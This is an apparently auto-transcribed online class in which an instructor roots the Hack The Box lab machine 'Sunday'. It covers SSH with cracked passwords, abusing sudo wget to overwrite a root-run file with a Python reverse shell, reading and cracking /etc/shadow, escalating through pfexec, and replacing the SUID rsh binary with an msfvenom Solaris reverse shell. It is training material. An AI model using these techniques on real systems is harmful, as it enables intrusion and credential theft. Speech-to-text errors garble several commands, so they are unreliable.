Hi guys, good afternoon everyone. You guys can hear me?
Yes, sir. Good afternoon.
Good afternoon, sir.
Yeah, very good afternoon. So let's start with today's session. I hope you guys remember that in our last session we were doing this machine known as Sunday and we were not able to completely root that machine. Hmm? We were trying to root the this box named Sunday from Hack the Box, but we were not able to complete that machine. Do you guys remember that? Am I audible? Guys, can you hear me?
Yes, sir. Yes, sir. Yes.
Okay, so you guys can hear me, but you guys do not want to reply. That's the scenario. Hmm. Okay.
No, sir.
Anyways,
No, no, sir.
so I'll be completing with that machine Sunday, and then I'll be starting with a new machine. Okay. So let's go to this directory called Sunday. 10 10 10 76. Okay, so I'm able to ping it. Great. Okay. If I'm not wrong, I performed the nmap scan, cat scan to nmap, and we figured out that there was an SSH running, and we were able to make an SSH connection as a user Sunday or as a user Sunny. Yeah, I believe as a user Sunny, we were able to do an SSH. So let's do it here. SSH Sunny at the rate hyphen p 22022, connection refused.
सर SSH-I नहीं आएगा कमांड में?
नहीं, हाइफन आई तो नहीं आएगा. Hyphen I से we use hyphen I to mention some sort of private key file, but here I
ओके,
don't have private key file.
अच्छा अच्छा.
Okay, so let's try to do it again. It says unable to negotiate. Yeah, I remember that we were having the same error previously as well. So we use some sort of additional flag to mention the custom to
Yes.
integrate this encryption protocol negotiation, and we use hyphen ox OKEX algo rhythms is equals to Defi Hellman Group Exchange SHA-1. Uh, Here it is. Let's do it now. Sunday. Okay, so I have a shell over here on the target machine. And similarly, I was able to find the password for the SAMI user as well. I don't know if you guys remember it or not, but we were able to find the password. I mean, we were able to find these hashes, some sort of shadow backup file, and we tried to crack these hashes, and we were able to find the password as cool dude exclamation mark. Hmm? So let's copy this command. Let's paste it here. Change the user, Sammy, and let's enter the password as cool dude exclamation mark. It is not prompting me for the password. Let me try to ping the target. Okay, now it is prompting me for the password. So let's enter cool dude here. Cool dude exclamation mark. And I have a shell over here. Okay. So here you can see that I have two shells on my target machine. One is with the user Sunny and another one is user Sammy. Okay. Now here the process for getting the root is it is all about chaining two different privileges here. So let's do center sudo hyphen l sudo hyphen l. So here what I can see is as a user Sunny, as a Sunny user, I can run this file with root permissions. Okay, without the requirement of any password. So when I try to run this file, troll command not found. Let's try to copy it and paste it here. It says permission denied. Let's do sudo troll. Let's run it with root permissions. Yeah, so here you can see I cannot access this file normally with a low privilege user, but I can access this file and run this file with high privilege user. That is sudo. Let me try to do sudo ls-la. See if I'm able to. No, I'm not able to. Okay. Let's try to read this binary. Cannot read it. Cannot see the file permissions of this binary. Okay, I can only and only run this binary with root. But if I go towards this SAMI shell here, okay, here sudo -l gives me wget command, and wget is basically used for downloading files. So keeping this thing in mind, keeping this scenario in mind, can you guys come up with a solution for this thing? Come up with a privilege escalation method?
Sir, hello.
Yeah.
I have a small doubt. Can we not just wget the shell and then catch it through a netcat to get the privilege escalation to the root user?
If we are going to do wget the shell, so wget is going to execute it or download it?
It will download it, then we can execute it. Like for running a shell, it is maybe it not required the uh, root account.
Hmm.
So it
For
will. Yes, sir.
for shell, we need root permissions.
Sir, your voice got uh, broke in middle, so I didn't listen the whole.
Yeah, so you're saying let's wget a shell,
Yeah,
execute it, okay, and
yeah,
catch it with a netcat.
yeah.
Are we going to get a root shell this way?
No, sir.
Yes.
No. Let's give this thing a try.
Sir, can we download the wget using wget command from Sunny?
Can we download the wget?
No. That file from Sunny using wget.
What we can do here is we can download a shell using wget. We can do a sudo wget so that it is running with root permissions, and then we can save whatever we are trying to download at this path. Replace it with root troll. Okay, replace the shell with root troll name, and then run this root troll file with sudo here, and then we can get a root shell back. That's what we can do. Okay, and or else what I can say, that's what we are going to do actually. So let's get a shell back, let's say Python shell. reverse Python shell. Where did I save them? cd/opt zoom. I have my Python pty shells here. I hope you guys remember this thing from my bash session where I downloaded them and used them. Hmm. These are my Python shells for which I was starting the, instead of starting the netcat, I was using this shell handler to catch the shell. So I'll be using this TCP pty backconnect.py. Let's copy this TCP pty backconnect.py to I have a shell here. Let's rename it. Let's change the L host and L port here. So let's do mousepad, or I can do VI as well.
So it's 10 or 20 L host.
10.
अच्छा कर्सर लगा रखा है.
And let's start a listener here. This is sudo dot slash python.
Sir, the spelling of sudo.
Sudo python tcp shell handler -b for bind, and my L host and L port 10 10 10 14 10 9632. Listening for the incoming connection. Here I have this edited shell. Let's remove it here. Let's host this shell. Let's do sudo python 3 -m http.server. Hosted the shell. Getting a shell back here. Let's download the shell here and get it executed here. It's a bit slow here. Sudo /root /troll. This is what I want to run here. But before that, get a shell here. Let's do sudo wget http. Okay, I did not mention the port here. So let's do 80. Okay, so it's taking some time here. Things are delayed. revsh.py. And let's save the output as /root/troll. That's what I want to do here. Okay, let's press enter here. And we did not get a shell back here. The file was downloaded, but here I'm not able to get it executed. Let's download it again. No such file or directory. So it is downloading the file. It is getting a hit on our server. It is showing successful here, but here the output is not changing. Okay. Maybe there is some automated process which is trying to override this file again and again. Okay. Let's try to do it again. These terminals are working very slow as well, with a lot of lags. wget-i/root/store sudo wget-i/root. I'm trying to execute it, but it is not taking the input very fast. Okay, let's do one thing. I cannot detach it. Hmm. Let's do one thing. Open a new terminal and do an SSH to SAMI from there. Let's do exit here.
So when executing, we need to mention the .py or need to specify
Sorry.
the file name. So when executing, no need to mention
When we
the
are
extension of the file like .py.
no, we do not need that.
No, no, okay. Well, even the name, right?
Hmm?
Even the file name.
Let's do CD PT HTTP on Sunday, and let's create a server here. Okay, nice and tidy. I have all of these three terminals with me. Now what I'm going to do is I'm going to do sudo wget http 10.10 10.10.14.10 slash ref dot py hyphen capital O hyphen capital O slash root slash cron. Okay, so the command is ready here. Let's press enter. It's getting downloaded in seconds. Let's do sleep 3 and then sudo root slash cron. Sleep 3 2 no such file or directory. Sudo wget -i. I'm trying to read the shadow file instead of doing this way. Let me see if I'm able to read the shadow file using wget. Yeah, so I'm able to read it. What I'm going to do is I'll try to crack the root password just the way I cracked the Sammy and Sunny passwords. I'll try to crack the root password here. Okay. If that way is not working, I'm trying with another way out. Let's see. Let's copy it. Paste it over here. Cat findings.txt. Let's do mousepad findings.txt. Save it, close it, and then let's run John. Let's use John. So this John -w is equals to user. Let's do user share Okay, I have word list somewhere else. Let me see where it is. I have it in, yeah, here it is. PWD, home RKS. Let's do /rk / rocku .txt followed by your file name, that is finding.txt. Okay, the spelling is wrong here. No, John. Let's do sudo. So now I'm trying to crack the root user passwords. Let's see if I'm able to crack it or not. I want to see status here. It is not showing me. Not getting anything here. Let this thing happen behind the scenes, okay? We'll wait and we'll see if we are able to crack the root password. Meanwhile, let me just stop it at finding.txt. Let's remove these files here, okay? Cp finding.txt, new finding.txt, and let's do mousepad finding.txt. Let's remove whatever is left. Let's provide only one hash and let this thing run. Now, meanwhile, this is happening.
Finding new finding.txt.
Sorry.
The file name new finding.txt.
The new finding.txt.
Yeah.
This is, I created a copy of this file.
Yeah, you can create it that in the last line.
Yeah. Here I tried to edit the file finding.txt and remove the Sunny and Sammy user credentials.
Yeah, okay.
That's what I did. So I only wanted to crack one hash. So I removed the others from there.
Okay, okay.
That's what I did. So that if it is trying to crack the hash, it is not going to crack the others as well.
Yeah, okay.
To reduce the time. Okay, let it run behind the scenes. Meanwhile, where is my shell? Here is my shell. Let's try to search for SUID executable files. Hmm? Let's try to do that. Let's do find hyphen perm, sorry, slash hyphen perm hyphen new equals to s hyphen type f 2 greater than slash dev slash null and press enter. I'm waiting for the output to reflect on the screen, as I believe the SSH connection is very slow. Yeah, it is here. Let's run it. Let's see if we have any SUID executable. So another way of rooting this machine is, see, one way was to download your normal shell and replace the troll file, execute that troll file and get a shell back. That's one way. Another way is to find the root password and crack it. Okay, crack it and do an SSH. That's another way. Now the third way is, let's try to create a new shell, a new reverse shell executable file, and use wget to replace one of these SUID executable file, and that way also we can get a shell. I'll show it to you. But before that, I can see pfexec here. Okay, so let's try to run pfexec, excuse me, and see if I'm able to get this shell or not. Pfexec. The SSH is very slow. It does not reflect the yeah, pfexec hyphen p. Let's do pfexec bash, press enter, and you can see who am I. I'm root. So this is also a way of rooting this machine. Let's do cd slash root slash, just do root ls and cat root.txt. Okay, and I can read the root flag from here. Okay, let's read it, and I can see a bunch of files here: troll.original and overwrite. If I'm going to inspect these files, what you are going to find is that there is a scheduled task running here. What it is doing is, it is repeatedly overwriting the troll file with troll.original file. That's what it is doing. I have already pressed enter, but the output is not being reflected quickly. Yeah, so let's do ls-la here, cat overwrite. Yeah, so you can see here, this is a bash script, and while true, do, in every 5 seconds our troll file gets replaced. So that's why we were failing our attempt. Okay, for downloading the shell through wget, replacing it with troll, executing the troll. Okay, that's why we were not able to get a shell back that way. but we can still get a shell back that way if we are quick enough. If we are going to do that very quickly, very fastly, we would be able to get a shell back. Okay. It's like if you downloaded the file and within 5 seconds or within 4 seconds, you executed it, you would be able to get a shell back. Okay. So let's do exit here. So I'm back to normal user here. And let's see some previously used commands. Yeah, let's run it. So I have multiple files here that I can run. So what I'm going to do is, as these are binary files, okay, let me see any random file, let's say RSH, let's take it, see if I'm able to do a file here. So these are all of all of these files are your binary files, ELF executable files. Let's do one thing. Let's create a shell, do a wget, and replace the shell with this user bin RSH. Okay, so let's go here. I don't need it now. Let's do one thing. Let's create a shell. Let's do MSF Venom -lp list payloads grep for Linux. I'm targeting the Linux. Let's do uname -a. It's a 32-bit. Sun Solaris. My Linux shell should work over here. I don't think that it is going to give any issues here. So let's do Linux shell reverse TCP MSF Venom -p lhost lport -f elf -o shell. That's all. Let's do lhost is equals to 10 10 14 10. Lport is equals to 9874. Press enter. Start a listener here. nc-nvlp. The shell is here. Let's do file shell. It's an ELF executable, LSB executable, Intel. Okay, nice. Okay. Let's do wget http 10 10 14 10 shell and replace it with user bin rsh. Let's wait for this command to complete. Yeah, so let's put sudo here. Let's run it. Let's run this file. Segmentation fault. I believe this is happening due to payload difference. So do Solaris. Okay, so I have this file Solaris x86 reverse TCP. Okay, so now I'll be using this OS specific reverse shell. Let's keep everything same, just change the payload. 86 shell reverse TCP. Let's do Solaris. Let's download this file here. Executed this file. Let's see if I'm able to get a shell back or not. And I got a shell back here. Who am I? And I'm root here. Okay. So this was also a way of rooting this machine. I can do cat root.txt. Okay. So far we looked into 4 methods for privilege escalation here. Can anyone summarize it? I don't think so. So let me just summarize it here. How many ways of privilege escalation we looked into this machine? So actually every machine is going to have more than one privilege escalation method most of the times. It only depends upon you that how much you are looking for. So 4 ways of privilege. The first one was wget sudo wget as Sami overwrite /root/troll and quickly execute troll as sudo and get a shell back. But we failed. We were not able to do this. But this is possible. Okay, this is possible. The another way for doing this thing was do a wget to read the shadow file, grab the root hash, crack the root password, and login SSH as root. The third way, so we have the password cracking still going on here. I believe it is this is a lengthy procedure, definitely going to take some time. Okay, but I believe that you would be able to crack the hash if you are patient. Okay, then wget, and so first of all find SUID executable files, found pf exec used for running OS level commands, and did user bin pf exec bash, got a root shell. Another way for doing the same thing was find another SUID executable which is really not that important, and then So what I did was I chose RSH here. User bin RSH here, and then wget elf exe for Solaris 32-bit and replace it with RSH. Execute RSH and get a shell back as root, because RSH is SUID exe. So these were the 4 ways that we discussed here. Okay. Any doubt, anything that is not clear, you can ask me now.
So we get root.txt, but another text file where you can find it from the user txt.
So where can I find user.txt?
Yeah, and yeah, understand.
In the user home directory, right? In the
Yes.
Sunny
Yeah,
or
yeah.
in the Sammy?
Yes, understand.
Yeah.
So
I'll
can you explain first method?
first method. Okay, yeah.
Yeah.
So see, the first method I was trying to do, and I failed again and again. I failed repeatedly. Okay. So what I was trying to do was, there were, let's try to draw it here itself. Yes. Yeah. So I had 2 shells. One was user Sunny shell and another one was Sammy shell. Sunny can run. Sunny was having, let me first of all write the shell names here as Sunny and Sammy. Sunny here and Sammy here. We had 2 shells, SSH connections, right? SSH,
Yeah.
SSH, SSH. When I did sudo -hell here, I found that I can run /root/troll.
Okay.
So I can run this file here with root permissions, and it was an executable file. When I was running this file, it was showing me the output as IDs, who am I, and ID command being executed. That's what it was. It was saying testing and root something like that. Let me just show you here. Uh, yeah, here you can see this was the output.
Okay.
So what I did was, I said, okay, I can execute this troll. What if I make this troll file, as malicious, this troll file as a reverse shell, as a malicious reverse shell, and I execute this file as root using Sunny user. Just type sudo /root/troll, and that malicious reverse shell is going to be executed, and I'll get a shell back, right?
Yeah.
But the issue was, how can I override this file? I do not have the permissions to modify the file, read the file, edit this file. I was not having the permissions there. So in the Sammy user, what I found was that I was able to do wget as sudo. Okay.
Okay.
That is as root. So then what I did was, I created a shell, Python shell, and I use this wget here to download a shell and save it as /root/troll, and then execute that thing as root to get a root shell.
Okay, okay.
Still, it's not clear, or it is clear now?
Yeah, it's clear.
Okay.
Sir, the SAMI cannot access the troll file. Troll. Hello.
Sorry? The
The
SAMI?
SAMI user cannot access troll file.
Yeah, I can hear you.
Sir, the SAMI
Yeah, the SAMI
user
user cannot access the troll.
troll file, right?
Yeah,
So if we try
right. But
to,
root can. Root can.
but
And we are
we
running.
tried. Sorry, we tried to execute from SAMI user. Is it work?
No, no, no. But we see SAMI user cannot access the troll file, but root can, right? When I do sudo wget,
Okay.
when I do sudo wget, who is running this? SAMI is not running it. Root is running it. Root is accessing the troll file. Root is downloading a file, and root can access anything.
Okay.
Okay, this was the command that I used here, 10 10 14 10 slash I had some rev shell.py and save the output as /root/troll. When I was trying to overwrite the file here, root was doing it.
Okay.
Yeah, so root can overwrite the file, SAMI cannot. Now it is clear.
Yes. Yes.
Yeah. Okay, so any doubt, guys? Anything that is not clear? All good? Good to go?
Yes, sir.
So by this week, I am planning to wrap the course up. Okay. So I would suggest you guys to practice a lot so that if there are any doubts, you are able to get them resolved by this week itself. Okay. I believe by Friday, I'll wrap it up. Okay. We'll be having a session from Tuesday, Wednesday, and Friday. Okay. Let's see.
Okay, sir.
Yeah. So guys, that
Okay.
okay. So yeah, that would be all, and